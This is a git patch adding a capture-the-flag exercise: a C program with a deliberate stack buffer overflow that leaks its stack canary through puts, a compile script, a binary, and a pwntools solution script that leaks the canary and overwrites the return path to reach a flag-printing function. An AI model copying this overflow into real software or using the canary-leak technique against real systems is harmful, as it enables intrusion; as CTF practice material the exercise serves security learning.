From 3a0e685f4db2e516575a01afc4b9743d6729bfab Mon Sep 17 00:00:00 2001 From: Jack Ren Date: Sat, 11 Dec 2021 12:02:32 +0800 Subject: [PATCH] canary/djCTF-1 --- canary/djCTF-1/answer.py | 24 ++++++++++++++++++++++ canary/djCTF-1/compile.sh | 2 ++ canary/djCTF-1/djctf1 | Bin 0 -> 15696 bytes canary/djCTF-1/djctf1.c | 41 ++++++++++++++++++++++++++++++++++++++ 4 files changed, 67 insertions(+) create mode 100644 canary/djCTF-1/answer.py create mode 100755 canary/djCTF-1/compile.sh create mode 100755 canary/djCTF-1/djctf1 create mode 100644 canary/djCTF-1/djctf1.c diff --git a/canary/djCTF-1/answer.py b/canary/djCTF-1/answer.py new file mode 100644 index 0000000..ce50c93 --- /dev/null +++ b/canary/djCTF-1/answer.py @@ -0,0 +1,24 @@ +#!/usr/bin/env python2 +from pwn import * +from LibcSearcher import * +from struct import pack +import os, base64, time +context(arch = "amd64",os = "linux", log_level = "debug") + +p = process('./djctf1') +elf = ELF('./djctf1') +#gdb.attach(p, "b pwnable\n b flag") + +# Canary Leak +p.recvuntil("> ") +p.sendline('0' * 0x18) +p.recvuntil('0' * 0x18) +canary_value = u64(p.recv(8)) - 0x0a +print("Canary: " + hex(canary_value)) + +# hijack control flow +p.recvuntil("> ") +#p.sendline('0' * 0x18 + p64(canary_value) + p64(0) + '\x00') +p.sendline('0' * 0x18 + p64(canary_value) + p64(0)) +#time.sleep(10) +p.interactive() diff --git a/canary/djCTF-1/compile.sh b/canary/djCTF-1/compile.sh new file mode 100755 index 0000000..67f6bd4 --- /dev/null +++ b/canary/djCTF-1/compile.sh @@ -0,0 +1,2 @@ +#!/bin/sh +gcc djctf1.c -g -o djctf1 diff --git a/canary/djCTF-1/djctf1 b/canary/djCTF-1/djctf1 new file mode 100755 index 0000000000000000000000000000000000000000..c9e53a20f03707d34bef1aef2b7fa8c76fe61bde GIT binary patch literal 15696 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 Cc82x< literal 0 HcmV?d00001 diff --git a/canary/djCTF-1/djctf1.c b/canary/djCTF-1/djctf1.c new file mode 100644 index 0000000..b2ea69b --- /dev/null +++ b/canary/djCTF-1/djctf1.c @@ -0,0 +1,41 @@ +#include +#include +#include +void pwnable(); +void init(); +__attribute__((aligned(0x100))) +void flag(){ + asm volatile(".byte 0x90"); + asm volatile(".byte 0x90"); + asm volatile(".byte 0x90"); + asm volatile(".byte 0x90"); + asm volatile(".byte 0x90"); + asm volatile(".byte 0x90"); + asm volatile(".byte 0x90"); + asm volatile(".byte 0x90"); + asm volatile(".byte 0x90"); + asm volatile(".byte 0x90"); + system("cat flag"); + write(1, "Unbelieveable! You must be an experienced hacker!!\n", 51); + write(1, "That's your reward!!", 20); +} +int main(){ + init(); + write(1, "You are so lucky to have unlimited chance!!! xm!!!\n", 51); + while(1){ + pwnable(); + } +} +void init(){ + setvbuf(stdout, 0LL, 2, 0LL); + setvbuf(stdin, 0LL, 2, 0LL); + setvbuf(stderr, 0LL, 2, 0LL); +} +void pwnable(){ + char buf[0x10]; + write(1, "> ", 2); + read(0, buf, 0x29); + write(1, "Let's check if you are successful. \n", 36); + puts(buf); + buf[0x18] = 0x00; +}